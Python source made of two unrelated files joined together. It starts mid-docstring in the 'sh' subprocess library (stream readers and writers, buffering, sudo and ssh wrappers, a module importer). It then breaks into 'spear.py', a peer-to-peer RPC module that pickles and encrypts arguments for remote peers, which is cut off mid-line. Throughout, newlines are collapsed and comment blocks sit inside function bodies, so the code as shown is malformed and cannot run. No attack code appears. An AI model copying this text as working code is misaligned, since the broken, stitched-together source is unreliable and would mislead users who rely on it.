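#   sh.cat(_in=("line %d\n" % i for i in range(3)))     # generators are consumed lazily
#
#   q = Queue()
#   p = sh.cat(_in=q, _bg=True)
#   q.put("queued\n")
#   q.put(None)                                         # None signals end-of-input
#   p.wait()
#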
""" if isinstance(input_obj, Queue): log_msg = "queue" get_chunk = get_queue_chunk_reader(input_obj) elif callable(input_obj): log_msg = "callable" get_chunk = get_callable_chunk_reader(input_obj) # also handles stringio elif hasattr(input_obj, "read"): log_msg = "file descriptor" get_chunk = get_file_chunk_reader(input_obj) elif isinstance(input_obj, basestring): log_msg = "string" get_chunk = get_iter_string_reader(input_obj) elif isinstance(input_obj, bytes): log_msg = "bytes" get_chunk = get_iter_string_reader(input_obj) elif isinstance(input_obj, GeneratorType): log_msg = "generator" get_chunk = get_iter_chunk_reader(iter(input_obj)) elif input_obj is None: log_msg = "None" def raise_(): raise DoneReadingForever get_chunk = raise_ else: try: it = iter(input_obj) except TypeError: raise Exception("unknown input object") else: log_msg = "general iterable" get_chunk = get_iter_chunk_reader(it) return get_chunk, log_msg def get_queue_chunk_reader(stdin): def fn(): try: chunk = stdin.get(True, 0.1) except Empty: raise NotYetReadyToRead if chunk is None: raise DoneReadingForever return chunk return fn def get_callable_chunk_reader(stdin): def fn(): try: data = stdin() except DoneReadingForever: raise if not data: raise DoneReadingForever return data return fn def get_iter_string_reader(stdin): """ return an iterator that returns a chunk of a string every time it is called. notice that even though bufsize_type might be line buffered, we're not doing any line buffering here. that's because our StreamBufferer handles all buffering. we just need to return a reasonable-sized chunk. """ bufsize = 1024 iter_str = (stdin[i:i + bufsize] for i in range(0, len(stdin), bufsize)) return get_iter_chunk_reader(iter_str) def get_iter_chunk_reader(stdin): def fn(): try: if IS_PY3: chunk = stdin.__next__() else: chunk = stdin.next() return chunk except StopIteration: raise DoneReadingForever return fn def get_file_chunk_reader(stdin): bufsize = 1024 def fn(): # python 3.* includes a fileno on stringios, but accessing it throws an # exception. that exception is how we'll know we can't do a poll on # stdin is_real_file = True if IS_PY3: try: stdin.fileno() except UnsupportedOperation: is_real_file = False # this poll is for files that may not yet be ready to read. we test # for fileno because StringIO/BytesIO cannot be used in a poll if is_real_file and hasattr(stdin, "fileno"): poller = Poller() poller.register_read(stdin) changed = poller.poll(0.1) ready = False for fd, events in changed: if events & (POLLER_EVENT_READ | POLLER_EVENT_HUP): ready = True if not ready: raise NotYetReadyToRead chunk = stdin.read(bufsize) if not chunk: raise DoneReadingForever else: return chunk return fn def bufsize_type_to_bufsize(bf_type): """ for a given bufsize type, return the actual bufsize we will read. notice that although 1 means "newline-buffered", we're reading a chunk size of 1024. this is because we have to read something. we let a StreamBufferer instance handle splitting our chunk on newlines """ # newlines if bf_type == 1: bufsize = 1024 # unbuffered elif bf_type == 0: bufsize = 1 # or buffered by specific amount else: bufsize = bf_type return bufsize class StreamWriter(object): """ StreamWriter reads from some input (the stdin param) and writes to a fd (the stream param). 
the stdin may be a Queue, a callable, something with the "read" method, a string, or an iterable """ def __init__(self, log, stream, stdin, bufsize_type, encoding, tty_in): self.stream = stream self.stdin = stdin self.log = log self.encoding = encoding self.tty_in = tty_in self.stream_bufferer = StreamBufferer(bufsize_type, self.encoding) self.get_chunk, log_msg = determine_how_to_read_input(stdin) self.log.debug("parsed stdin as a %s", log_msg) def fileno(self): """ defining this allows us to do poll on an instance of this class """ return self.stream def write(self): """ attempt to get a chunk of data to write to our child process's stdin, then write it. the return value answers the questions "are we done writing forever?" """ # get_chunk may sometimes return bytes, and sometimes return strings # because of the nature of the different types of STDIN objects we # support try: chunk = self.get_chunk() if chunk is None: raise DoneReadingForever except DoneReadingForever: self.log.debug("done reading") if self.tty_in: # EOF time try: char = termios.tcgetattr(self.stream)[6][termios.VEOF] except: # noqa: E722 char = chr(4).encode() # normally, one EOF should be enough to signal to an program # that is read()ing, to return 0 and be on your way. however, # some programs are misbehaved, like python3.1 and python3.2. # they don't stop reading sometimes after read() returns 0. # this can be demonstrated with the following program: # # import sys # sys.stdout.write(sys.stdin.read()) # # then type 'a' followed by ctrl-d 3 times. in python # 2.6,2.7,3.3,3.4,3.5,3.6, it only takes 2 ctrl-d to terminate. # however, in python 3.1 and 3.2, it takes all 3. # # so here we send an extra EOF along, just in case. i don't # believe it can hurt anything os.write(self.stream, char) os.write(self.stream, char) return True except NotYetReadyToRead: self.log.debug("received no data") return False # if we're not bytes, make us bytes if IS_PY3 and not isinstance(chunk, bytes): chunk = chunk.encode(self.encoding) for proc_chunk in self.stream_bufferer.process(chunk): self.log.debug("got chunk size %d: %r", len(proc_chunk), proc_chunk[:30]) self.log.debug("writing chunk to process") try: os.write(self.stream, proc_chunk) except OSError: self.log.debug("OSError writing stdin chunk") return True def close(self): self.log.debug("closing, but flushing first") chunk = self.stream_bufferer.flush() self.log.debug("got chunk size %d to flush: %r", len(chunk), chunk[:30]) try: if chunk: os.write(self.stream, chunk) except OSError: pass os.close(self.stream) def determine_how_to_feed_output(handler, encoding, decode_errors): if callable(handler): process, finish = get_callback_chunk_consumer(handler, encoding, decode_errors) # in py3, this is used for bytes elif isinstance(handler, (cStringIO, iocStringIO)): process, finish = get_cstringio_chunk_consumer(handler) # in py3, this is used for unicode elif isinstance(handler, (StringIO, ioStringIO)): process, finish = get_stringio_chunk_consumer(handler, encoding, decode_errors) elif hasattr(handler, "write"): process, finish = get_file_chunk_consumer(handler) else: try: handler = int(handler) except (ValueError, TypeError): def process(chunk): return False # noqa: E731 def finish(): return None # noqa: E731 else: process, finish = get_fd_chunk_consumer(handler) return process, finish def get_fd_chunk_consumer(handler): handler = fdopen(handler, "w", closefd=False) return get_file_chunk_consumer(handler) def get_file_chunk_consumer(handler): if getattr(handler, "encoding", None): 
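#
# A sketch of the output targets dispatched on above (the listing file is made up):
#
#   import io, sh
#
#   text_buf = io.StringIO()                  # text buffer: chunks are decoded first
#   raw_buf = io.BytesIO()                    # bytes buffer: chunks are written as-is
#   sh.ls("-la", _out=text_buf, _err=raw_buf)
#
#   with open("listing.txt", "wb") as f:      # anything with .write() works
#       sh.ls("-la", _out=f)
#
#   sh.ls("-la", _out=2)                      # a bare int is treated as a file descriptor
#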
def encode(chunk): return chunk.decode(handler.encoding) # noqa: E731 else: def encode(chunk): return chunk # noqa: E731 if hasattr(handler, "flush"): flush = handler.flush else: def flush(): return None # noqa: E731 def process(chunk): handler.write(encode(chunk)) # we should flush on an fd. chunk is already the correctly-buffered # size, so we don't need the fd buffering as well flush() return False def finish(): flush() return process, finish def get_callback_chunk_consumer(handler, encoding, decode_errors): def process(chunk): # try to use the encoding first, if that doesn't work, send # the bytes, because it might be binary try: chunk = chunk.decode(encoding, decode_errors) except UnicodeDecodeError: pass return handler(chunk) def finish(): pass return process, finish def get_cstringio_chunk_consumer(handler): def process(chunk): handler.write(chunk) return False def finish(): pass return process, finish def get_stringio_chunk_consumer(handler, encoding, decode_errors): def process(chunk): handler.write(chunk.decode(encoding, decode_errors)) return False def finish(): pass return process, finish class StreamReader(object): """ reads from some output (the stream) and sends what it just read to the handler. """ def __init__(self, log, stream, handler, buffer, bufsize_type, encoding, decode_errors, pipe_queue=None, save_data=True): self.stream = stream self.buffer = buffer self.save_data = save_data self.encoding = encoding self.decode_errors = decode_errors self.pipe_queue = None if pipe_queue: self.pipe_queue = weakref.ref(pipe_queue) self.log = log self.stream_bufferer = StreamBufferer(bufsize_type, self.encoding, self.decode_errors) self.bufsize = bufsize_type_to_bufsize(bufsize_type) self.process_chunk, self.finish_chunk_processor = \ determine_how_to_feed_output(handler, encoding, decode_errors) self.should_quit = False def fileno(self): """ defining this allows us to do poll on an instance of this class """ return self.stream def close(self): chunk = self.stream_bufferer.flush() self.log.debug("got chunk size %d to flush: %r", len(chunk), chunk[:30]) if chunk: self.write_chunk(chunk) self.finish_chunk_processor() if self.pipe_queue and self.save_data: self.pipe_queue().put(None) os.close(self.stream) def write_chunk(self, chunk): # in PY3, the chunk coming in will be bytes, so keep that in mind if not self.should_quit: self.should_quit = self.process_chunk(chunk) if self.save_data: self.buffer.append(chunk) if self.pipe_queue: self.log.debug("putting chunk onto pipe: %r", chunk[:30]) self.pipe_queue().put(chunk) def read(self): # if we're PY3, we're reading bytes, otherwise we're reading # str try: chunk = no_interrupt(os.read, self.stream, self.bufsize) except OSError as e: self.log.debug("got errno %d, done reading", e.errno) return True if not chunk: self.log.debug("got no chunk, done reading") return True self.log.debug("got chunk size %d: %r", len(chunk), chunk[:30]) for chunk in self.stream_bufferer.process(chunk): self.write_chunk(chunk) class StreamBufferer(object): """ this is used for feeding in chunks of stdout/stderr, and breaking it up into chunks that will actually be put into the internal buffers. 
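#
# A sketch of how the buffering sizes above change what a callback receives:
#
#   import sh
#
#   def per_line(line):                       # _out_bufsize=1 (default): whole lines
#       pass
#   sh.ping("-c", "3", "127.0.0.1", _out=per_line)
#
#   def per_chunk(chunk):                     # _out_bufsize=0: unbuffered chunks
#       pass
#   sh.ping("-c", "3", "127.0.0.1", _out=per_chunk, _out_bufsize=0)
#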
for example, if you have two processes, one being piped to the other, and you want that, first process to feed lines of data (instead of the chunks however they come in), OProc will use an instance of this class to chop up the data and feed it as lines to be sent down the pipe """ def __init__(self, buffer_type, encoding=DEFAULT_ENCODING, decode_errors="strict"): # 0 for unbuffered, 1 for line, everything else for that amount self.type = buffer_type self.buffer = [] self.n_buffer_count = 0 self.encoding = encoding self.decode_errors = decode_errors # this is for if we change buffering types. if we change from line # buffered to unbuffered, its very possible that our self.buffer list # has data that was being saved up (while we searched for a newline). # we need to use that up, so we don't lose it self._use_up_buffer_first = False # the buffering lock is used because we might change the buffering # types from a different thread. for example, if we have a stdout # callback, we might use it to change the way stdin buffers. so we # lock self._buffering_lock = threading.RLock() self.log = Logger("stream_bufferer") def change_buffering(self, new_type): # TODO, when we stop supporting 2.6, make this a with context self.log.debug("acquiring buffering lock for changing buffering") self._buffering_lock.acquire() self.log.debug("got buffering lock for changing buffering") try: if new_type == 0: self._use_up_buffer_first = True self.type = new_type finally: self._buffering_lock.release() self.log.debug("released buffering lock for changing buffering") def process(self, chunk): # MAKE SURE THAT THE INPUT IS PY3 BYTES # THE OUTPUT IS ALWAYS PY3 BYTES # TODO, when we stop supporting 2.6, make this a with context self.log.debug("acquiring buffering lock to process chunk (buffering: %d)", self.type) self._buffering_lock.acquire() self.log.debug("got buffering lock to process chunk (buffering: %d)", self.type) try: # unbuffered if self.type == 0: if self._use_up_buffer_first: self._use_up_buffer_first = False to_write = self.buffer self.buffer = [] to_write.append(chunk) return to_write return [chunk] # line buffered elif self.type == 1: total_to_write = [] nl = "\n".encode(self.encoding) while True: newline = chunk.find(nl) if newline == -1: break chunk_to_write = chunk[:newline + 1] if self.buffer: chunk_to_write = b"".join(self.buffer) + chunk_to_write self.buffer = [] self.n_buffer_count = 0 chunk = chunk[newline + 1:] total_to_write.append(chunk_to_write) if chunk: self.buffer.append(chunk) self.n_buffer_count += len(chunk) return total_to_write # N size buffered else: total_to_write = [] while True: overage = self.n_buffer_count + len(chunk) - self.type if overage >= 0: ret = "".encode(self.encoding).join(self.buffer) + chunk chunk_to_write = ret[:self.type] chunk = ret[self.type:] total_to_write.append(chunk_to_write) self.buffer = [] self.n_buffer_count = 0 else: self.buffer.append(chunk) self.n_buffer_count += len(chunk) break return total_to_write finally: self._buffering_lock.release() self.log.debug("released buffering lock for processing chunk (buffering: %d)", self.type) def flush(self): self.log.debug("acquiring buffering lock for flushing buffer") self._buffering_lock.acquire() self.log.debug("got buffering lock for flushing buffer") try: ret = "".encode(self.encoding).join(self.buffer) self.buffer = [] return ret finally: self._buffering_lock.release() self.log.debug("released buffering lock for flushing buffer") def with_lock(lock): def wrapped(fn): fn = contextmanager(fn) @contextmanager 
def wrapped2(*args, **kwargs): with lock: with fn(*args, **kwargs): yield return wrapped2 return wrapped @with_lock(PUSHD_LOCK) def pushd(path): """ pushd changes the actual working directory for the duration of the context, unlike the _cwd arg this will work with other built-ins such as sh.glob correctly """ orig_path = os.getcwd() os.chdir(path) try: yield finally: os.chdir(orig_path) @contextmanager def _args(**kwargs): """ allows us to temporarily override all the special keyword parameters in a with context """ kwargs_str = ",".join(["%s=%r" % (k, v) for k, v in kwargs.items()]) raise DeprecationWarning(""" sh.args() has been deprecated because it was never thread safe. use the following instead: sh2 = sh({kwargs}) sh2.your_command() or sh2 = sh({kwargs}) from sh2 import your_command your_command() """.format(kwargs=kwargs_str)) class Environment(dict): """ this allows lookups to names that aren't found in the global scope to be searched for as a program name. for example, if "ls" isn't found in this module's scope, we consider it a system program and try to find it. we use a dict instead of just a regular object as the base class because the exec() statement used in the run_repl requires the "globals" argument to be a dictionary """ # this is a list of all of the names that the sh module exports that will # not resolve to functions. we don't want to accidentally shadow real # commands with functions/imports that we define in sh.py. for example, # "import time" may override the time system program whitelist = set(( "Command", "RunningCommand", "CommandNotFound", "DEFAULT_ENCODING", "DoneReadingForever", "ErrorReturnCode", "NotYetReadyToRead", "SignalException", "ForkException", "TimeoutException", "StreamBufferer", "__project_url__", "__version__", "__file__", "_args", "pushd", "glob", "contrib", )) def __init__(self, globs, baked_args=None): """ baked_args are defaults for the 'sh' execution context. for example: tmp = sh(_out=StringIO()) 'out' would end up in here as an entry in the baked_args dict """ super(dict, self).__init__() self.globs = globs self.baked_args = baked_args or {} def __getitem__(self, k): if k == 'args': # Let the deprecated '_args' context manager be imported as 'args' k = '_args' # if we're trying to import something real, see if it's in our global scope. # what defines "real" is that it's in our whitelist if k in self.whitelist: return self.globs[k] # somebody tried to be funny and do "from sh import *" if k == "__all__": warnings.warn("Cannot import * from sh. Please import sh or import programs individually.") return [] # check if we're naming a dynamically generated ReturnCode exception exc = get_exc_from_name(k) if exc: return exc # https://github.com/ipython/ipython/issues/2577 # https://github.com/amoffat/sh/issues/97#issuecomment-10610629 if k.startswith("__") and k.endswith("__"): raise AttributeError # is it a custom builtin? builtin = getattr(self, "b_" + k, None) if builtin: return builtin # is it a command? cmd = resolve_command(k, self.baked_args) if cmd: return cmd # how about an environment variable? # this check must come after testing if its a command, because on some # systems, there are an environment variables that can conflict with # command names. # https://github.com/amoffat/sh/issues/238 try: return os.environ[k] except KeyError: pass # nothing found, raise an exception raise CommandNotFound(k) # methods that begin with "b_" are custom builtins and will override any # program that exists in our path. 
this is useful for things like # common shell builtins that people are used to, but which aren't actually # full-fledged system binaries @staticmethod def b_cd(path=None): if path: os.chdir(path) else: os.chdir(os.path.expanduser('~')) @staticmethod def b_which(program, paths=None): return which(program, paths) class Contrib(ModuleType): # pragma: no cover @classmethod def __call__(cls, name): def wrapper1(fn): @property def cmd_getter(self): cmd = resolve_command(name) if not cmd: raise CommandNotFound(name) new_cmd = fn(cmd) return new_cmd setattr(cls, name, cmd_getter) return fn return wrapper1 mod_name = __name__ + ".contrib" contrib = Contrib(mod_name) sys.modules[mod_name] = contrib @contrib("git") def git(orig): # pragma: no cover """ most git commands play nicer without a TTY """ cmd = orig.bake(_tty_out=False) return cmd @contrib("sudo") def sudo(orig): # pragma: no cover """ a nicer version of sudo that uses getpass to ask for a password, or allows the first argument to be a string password """ prompt = "[sudo] password for %s: " % getpass.getuser() def stdin(): pw = getpass.getpass(prompt=prompt) + "\n" yield pw def process(a, kwargs): password = kwargs.pop("password", None) if password is None: pass_getter = stdin() else: pass_getter = password.rstrip("\n") + "\n" kwargs["_in"] = pass_getter return a, kwargs cmd = orig.bake("-S", _arg_preprocess=process) return cmd @contrib("ssh") def ssh(orig): # pragma: no cover """ An ssh command for automatic password login """ class SessionContent(object): def __init__(self): self.chars = deque(maxlen=50000) self.lines = deque(maxlen=5000) self.line_chars = [] self.last_line = "" self.cur_char = "" def append_char(self, char): if char == "\n": line = self.cur_line self.last_line = line self.lines.append(line) self.line_chars = [] else: self.line_chars.append(char) self.chars.append(char) self.cur_char = char @property def cur_line(self): line = "".join(self.line_chars) return line class SSHInteract(object): def __init__(self, prompt_match, pass_getter, out_handler, login_success): self.prompt_match = prompt_match self.pass_getter = pass_getter self.out_handler = out_handler self.login_success = login_success self.content = SessionContent() # some basic state self.pw_entered = False self.success = False def __call__(self, char, stdin): self.content.append_char(char) if self.pw_entered and not self.success: self.success = self.login_success(self.content) if self.success: return self.out_handler(self.content, stdin) if self.prompt_match(self.content): password = self.pass_getter() stdin.put(password + "\n") self.pw_entered = True def process(a, kwargs): real_out_handler = kwargs.pop("interact") password = kwargs.pop("password", None) login_success = kwargs.pop("login_success", None) prompt_match = kwargs.pop("prompt", None) prompt = "Please enter SSH password: " if prompt_match is None: def prompt_match(content): return content.cur_line.endswith("password: ") # noqa: E731 if password is None: def pass_getter(): return getpass.getpass(prompt=prompt) # noqa: E731 else: def pass_getter(): return password.rstrip("\n") # noqa: E731 if login_success is None: def login_success(content): return True # noqa: E731 kwargs["_out"] = SSHInteract(prompt_match, pass_getter, real_out_handler, login_success) return a, kwargs cmd = orig.bake(_out_bufsize=0, _tty_in=True, _unify_ttys=True, _arg_preprocess=process) return cmd def run_repl(env): # pragma: no cover banner = "\n>> sh v{version}\n>> https://github.com/amoffat/sh\n" 
print(banner.format(version=__version__)) while True: try: line = raw_input("sh> ") except (ValueError, EOFError): break try: exec(compile(line, "<dummy>", "single"), env, env) except SystemExit: break except: # noqa: E722 print(traceback.format_exc()) # cleans up our last line print("") # this is a thin wrapper around THIS module (we patch sys.modules[__name__]). # this is in the case that the user does a "from sh import whatever" # in other words, they only want to import certain programs, not the whole # system PATH worth of commands. in this case, we just proxy the # import lookup to our Environment class class SelfWrapper(ModuleType): def __init__(self, self_module, baked_args=None): # this is super ugly to have to copy attributes like this, # but it seems to be the only way to make reload() behave # nicely. if i make these attributes dynamic lookups in # __getattr__, reload sometimes chokes in weird ways... super(SelfWrapper, self).__init__( name=getattr(self_module, '__name__', None), doc=getattr(self_module, '__doc__', None) ) for attr in ["__builtins__", "__file__", "__package__"]: setattr(self, attr, getattr(self_module, attr, None)) # python 3.2 (2.7 and 3.3 work fine) breaks on osx (not ubuntu) # if we set this to None. and 3.3 needs a value for __path__ self.__path__ = [] self.__self_module = self_module self.__env = Environment(globals(), baked_args=baked_args) def __getattr__(self, name): return self.__env[name] def __call__(self, **kwargs): """ returns a new SelfWrapper object, where all commands spawned from it have the baked_args kwargs set on them by default """ baked_args = self.__env.baked_args.copy() baked_args.update(kwargs) new_mod = self.__class__(self.__self_module, baked_args) # inspect the line in the parent frame that calls and assigns the new sh # variable, and get the name of the new variable we're assigning to. # this is very brittle and pretty much a sin. but it works in 99% of # the time and the tests pass # # the reason we need to do this is because we need to remove the old # cached module from sys.modules. if we don't, it gets re-used, and any # old baked params get used, which is not what we want parent = inspect.stack()[1] try: code = parent[4][0].strip() except TypeError: # On the REPL or from the commandline, we don't get the source code in the # top stack frame # Older versions of pypy don't set parent[1] the same way as CPython or newer versions # of Pypy so we have to special case that too. if parent[1] in ('<stdin>', '<string>') or ( parent[1] == '<module>' and platform.python_implementation().lower() == 'pypy'): # This depends on things like Python's calling convention and the layout of stack # frames but it's a fix for a bug in a very cornery cornercase so.... 
module_name = parent[0].f_code.co_names[-1] else: raise else: parsed = ast.parse(code) try: module_name = parsed.body[0].targets[0].id except Exception: # Diagnose what went wrong if not isinstance(parsed.body[0], ast.Assign): raise RuntimeError("A new execution context must be assigned to a variable") raise if module_name == __name__: raise RuntimeError("Cannot use the name '%s' as an execution context" % __name__) sys.modules.pop(module_name, None) return new_mod def in_importlib(frame): """ helper for checking if a filename is in importlib guts """ return frame.f_code.co_filename == "<frozen importlib._bootstrap>" def register_importer(): """ registers our fancy importer that can let us import from a module name, like: import sh tmp = sh() from tmp import ls """ def test(importer_cls): try: return importer_cls.__class__.__name__ == ModuleImporterFromVariables.__name__ except AttributeError: # ran into importer which is not a class instance return False already_registered = any([True for i in sys.meta_path if test(i)]) if not already_registered: importer = ModuleImporterFromVariables(restrict_to=[SelfWrapper.__name__], ) sys.meta_path.insert(0, importer) return not already_registered def fetch_module_from_frame(name, frame): mod = frame.f_locals.get(name, frame.f_globals.get(name, None)) return mod class ModuleImporterFromVariables(object): """ a fancy importer that allows us to import from a variable that was recently set in either the local or global scope, like this: sh2 = sh(_timeout=3) from sh2 import ls """ def __init__(self, restrict_to=None): self.restrict_to = set(restrict_to or set()) def find_module(self, mod_fullname, path=None): """ mod_fullname doubles as the name of the VARIABLE holding our new sh context. for example: derp = sh() from derp import ls here, mod_fullname will be "derp". keep that in mind as we go through the rest of this function """ parent_frame = inspect.currentframe().f_back if parent_frame and parent_frame.f_code.co_name == "find_spec": parent_frame = parent_frame.f_back while parent_frame and in_importlib(parent_frame): parent_frame = parent_frame.f_back # Calling PyImport_ImportModule("some_module"); via the C API may not # have a parent frame. Early-out to avoid in_importlib() trying to # get f_code from None when looking for 'some_module'. # This also happens when using gevent apparently. if not parent_frame: return None # this line is saying "hey, does mod_fullname exist as a name we've # defined previously?" the purpose of this is to ensure that # mod_fullname is really a thing we've defined. if we haven't defined # it before, then we "can't" import from it module = fetch_module_from_frame(mod_fullname, parent_frame) if not module: return None # make sure it's a class we're allowed to import from if module.__class__.__name__ not in self.restrict_to: return None return self def find_spec(self, fullname, path=None, target=None): """ find_module() is deprecated since Python 3.4 in favor of find_spec() """ from importlib.machinery import ModuleSpec found = self.find_module(fullname, path) return ModuleSpec(fullname, found) if found is not None else None def load_module(self, mod_fullname): parent_frame = inspect.currentframe().f_back while in_importlib(parent_frame): parent_frame = parent_frame.f_back module = fetch_module_from_frame(mod_fullname, parent_frame) # we HAVE to include the module in sys.modules, per the import PEP. # older versions of python were more lenient about this being set, but # not in >= python3.3, unfortunately. 
this requirement necessitates the # ugly code in SelfWrapper.__call__ sys.modules[mod_fullname] = module module.__loader__ = self return module def run_tests(env, locale, a, version, force_select, **extra_env): # pragma: no cover py_version = "python" py_version += str(version) py_bin = which(py_version) return_code = None poller = "poll" if force_select: poller = "select" if py_bin: print("Testing %s, locale %r, poller: %s" % (py_version.capitalize(), locale, poller)) env["SH_TESTS_USE_SELECT"] = str(int(force_select)) env["LANG"] = locale for k, v in extra_env.items(): env[k] = str(v) cmd = [py_bin, "-W", "ignore", os.path.join(THIS_DIR, "test.py")] + a[1:] print("Running %r" % cmd) return_code = os.spawnve(os.P_WAIT, cmd[0], cmd, env) return return_code def main(): # pragma: no cover from optparse import OptionParser parser = OptionParser() parser.add_option("-e", "--envs", dest="envs", default=None, action="append") parser.add_option("-l", "--locales", dest="constrain_locales", default=None, action="append") options, parsed_args = parser.parse_args() # these are essentially restrictions on what envs/constrain_locales to restrict to for # the tests. if they're empty lists, it means use all available action = None if parsed_args: action = parsed_args[0] if action in ("test", "travis", "tox"): import test coverage = None if test.HAS_UNICODE_LITERAL: try: import coverage except ImportError: pass env = os.environ.copy() env["SH_TESTS_RUNNING"] = "1" if coverage: test.append_module_path(env, coverage) # if we're testing locally, run all versions of python on the system if action == "test": all_versions = ("2.6", "2.7", "3.1", "3.2", "3.3", "3.4", "3.5", "3.6", "3.7", "3.8") # if we're testing on travis or tox, just use the system's default python, since travis will spawn a vm per # python version in our .travis.yml file, and tox will run its matrix via tox.ini else: v = sys.version_info sys_ver = "%d.%d" % (v[0], v[1]) all_versions = (sys_ver,) all_force_select = [True] if HAS_POLL: all_force_select.append(False) all_locales = ("en_US.UTF-8", "C") i = 0 ran_versions = set() for locale in all_locales: # make sure this locale is allowed if options.constrain_locales and locale not in options.constrain_locales: continue for version in all_versions: # make sure this version is allowed if options.envs and version not in options.envs: continue for force_select in all_force_select: env_copy = env.copy() ran_versions.add(version) exit_code = run_tests(env_copy, locale, parsed_args, version, force_select, SH_TEST_RUN_IDX=i) if exit_code is None: print("Couldn't find %s, skipping" % version) elif exit_code != 0: print("Failed for %s, %s" % (version, locale)) exit(1) i += 1 print("Tested Python versions: %s" % ",".join(sorted(list(ran_versions)))) else: env = Environment(globals()) run_repl(env) if __name__ == "__main__": # pragma: no cover # we're being run as a stand-alone script main() else: # we're being imported from somewhere sys.modules[__name__] = SelfWrapper(sys.modules[__name__]) register_importer()
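# Usage sketch for the execution-context machinery above (SelfWrapper,
# Environment, ModuleImporterFromVariables). Illustrative only: it assumes the
# `sh` package is importable and that `ls` exists on PATH; nothing calls it.
def _baked_context_sketch():  # pragma: no cover
    import sh

    # bake default special kwargs into a new context; at module level the same
    # context can also be imported from, e.g. "from sh2 import ls", which is
    # what ModuleImporterFromVariables above resolves
    sh2 = sh(_tty_out=False)
    print(sh2.ls("-la"))

    # pushd() changes the real working directory for the duration of the
    # block, unlike the _cwd special kwarg
    with sh.pushd("/tmp"):
        print(sh.pwd())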
spear.py
from asyncio.streams import StreamWriter from socket import * import asyncio from cryptography.fernet import Fernet, InvalidToken import rsa import hashlib import random import time import functools import threading import base64 import json from concurrent.futures import ThreadPoolExecutor import pickle import traceback import inspect def check_port(port): c_sock = socket(AF_INET, SOCK_STREAM) res = c_sock.connect_ex(('127.0.0.1', port)) == 0 c_sock.close() return res def free_port(): free_socket = socket(AF_INET, SOCK_STREAM) free_socket.bind(('0.0.0.0', 0)) free_socket.listen(5) port = free_socket.getsockname()[1] free_socket.close() return port def ip(): return gethostbyname(gethostname()) class Peer: def __init__(self, originator, target='*', thread_count=None, timeout=1e99): self.originator = originator if target == '*': self.peers = {} for p in originator.peers['local'].keys(): self.peers[p] = originator.peers['local'][p] for p in originator.peers['remote'].keys(): if not p in self.peers.keys(): self.peers[p] = originator.peers['remote'][p] elif type(target) == list: self.peers = {x['id']: x for x in [ originator.find_peer(i) for i in target]} else: self.peers = {} peer = originator.find_peer(target) self.peers[peer['id']] = peer self.thread_count = thread_count self.timeout = timeout def command_one(self, target, path, args=[], kwargs={}): try: peer = self.peers[target] temp_key = Fernet.generate_key() if peer['type'] == 'local': packet_raw = { 'originator': self.originator.id, 'originator_name': self.originator.name, 'originator_key': base64.urlsafe_b64encode(self.originator.public.save_pkcs1()).decode('utf-8'), 'originator_type': 'local', 'originator_ip': [ip(), self.originator.service_port], 'target': target, 'path': path, 'args': [base64.urlsafe_b64encode(pickle.dumps(arg)).decode('utf-8') for arg in args], 'kwargs': {key: base64.urlsafe_b64encode(pickle.dumps(kwargs[key])).decode('utf-8') for key in kwargs.keys()} } encoded_packet = base64.urlsafe_b64encode( json.dumps(packet_raw).encode('utf-8')) encrypted_packet = base64.urlsafe_b64encode( Fernet(temp_key).encrypt(encoded_packet)) encrypted_key = base64.urlsafe_b64encode( rsa.encrypt(temp_key, peer['public_key'])) assembled_packet = encrypted_key + \ '§'.encode('utf-8') + encrypted_packet if self.originator.network_encryption: assembled_packet = base64.urlsafe_b64encode( self.originator.network_encryption.encrypt(assembled_packet)) temp_socket = create_connection( (peer['address'].split(':')[0], int(peer['address'].split(':')[1]))) temp_socket.sendall(assembled_packet+b'\n') response = b'' start = time.time() while True and time.time() < start + self.timeout: data = temp_socket.recv(1024) if len(data) == 0: break response += data.strip(b'\n') if time.time() >= start + self.timeout: raise TimeoutError if self.originator.network_encryption: response = self.originator.network_encryption.decrypt(base64.urlsafe_b64decode(response)) response = base64.urlsafe_b64decode(response) response = Fernet(temp_key).decrypt(response) response = base64.urlsafe_b64decode(response).decode('utf-8') response = json.loads(response) return response else: relay = random.choice(peer['relays']) if ':' in relay: relay = [relay.split(':')[0], int(relay.split(':')[1])] else: relay = [relay, 2201] relay_str = relay[0] + ':' + str(relay[1]) packet_raw = { 'type': 'command', 'originator': self.originator.id, 'originator_name': self.originator.name, 'originator_key': base64.urlsafe_b64encode(self.originator.public.save_pkcs1()).decode('utf-8'), 
'originator_type': 'remote', 'originator_relay': relay, 'target': target, 'path': path, 'args': [base64.urlsafe_b64encode(pickle.dumps(arg)).decode('utf-8') for arg in args], 'kwargs': {key: base64.urlsafe_b64encode(pickle.dumps(kwargs[key])).decode('utf-8') for key in kwargs.keys()} } encoded_packet = base64.urlsafe_b64encode( json.dumps(packet_raw).encode('utf-8')) encrypted_packet = base64.urlsafe_b64encode( Fernet(temp_key).encrypt(encoded_packet)) encrypted_key = base64.urlsafe_b64encode( rsa.encrypt(temp_key, peer['public_key'])) assembled_packet = encrypted_key + \ '§'.encode('utf-8') + encrypted_packet if self.originator.network_encryption: assembled_packet = base64.urlsafe_b64encode( self.originator.network_encryption.encrypt(assembled_packet)) block_id = hashlib.sha256(str(time.time() + random.uniform(-1,1)).encode('utf-8')).hexdigest() try: sock = create_connection(relay, timeout=2) except TimeoutError: self.originator.relays[relay_str]['public_key'] = None return packet = json.dumps({ 'originator': self.originator.id, 'target': target, 'network': self.originator.network_name, 'id': block_id, 'data': assembled_packet.decode('utf-8') }) packet = 'CMND:' + packet tfk = Fernet.generate_key() tempfernet = Fernet(tfk) enc = rsa.encrypt(tfk, self.originator.relays[relay_str]['public_key']) to_send = base64.urlsafe_b64encode( enc)+'§'.encode('utf-8')+base64.urlsafe_b64encode(tempfernet.encrypt(packet.encode('utf-8')))+b'\n' sock.sendall(to_send) packet_response = '' while True: dat = sock.recv(1024) if not dat: break packet_response += dat.decode('utf-8').strip() sock.close() if packet_response == 'error': self.originator.relays[relay_str]['public_key'] = None return 'error' decrypted = tempfernet.decrypt( base64.urlsafe_b64decode(packet_response.encode('utf-8'))) if decrypted == 'error': print('Encryption error') start = time.time() while True and time.time() < start + self.timeout: if block_id in self.originator.responses.keys(): break if time.time() >= start + self.timeout: raise TimeoutError response = self.originator.responses[block_id]['data'].encode('utf-8') if self.originator.network_encryption: response = self.originator.network_encryption.decrypt(base64.urlsafe_b64decode(response)) response = base64.urlsafe_b64decode(response) response = Fernet(temp_key).decrypt(response) response = base64.urlsafe_b64decode(response).decode('utf-8') response = json.loads(response) del self.originator.responses[block_id] return response except: traceback.print_exc() def command(self, path, *args, **kwargs): with ThreadPoolExecutor(max_workers=self.thread_count) as executor: results = {pid: 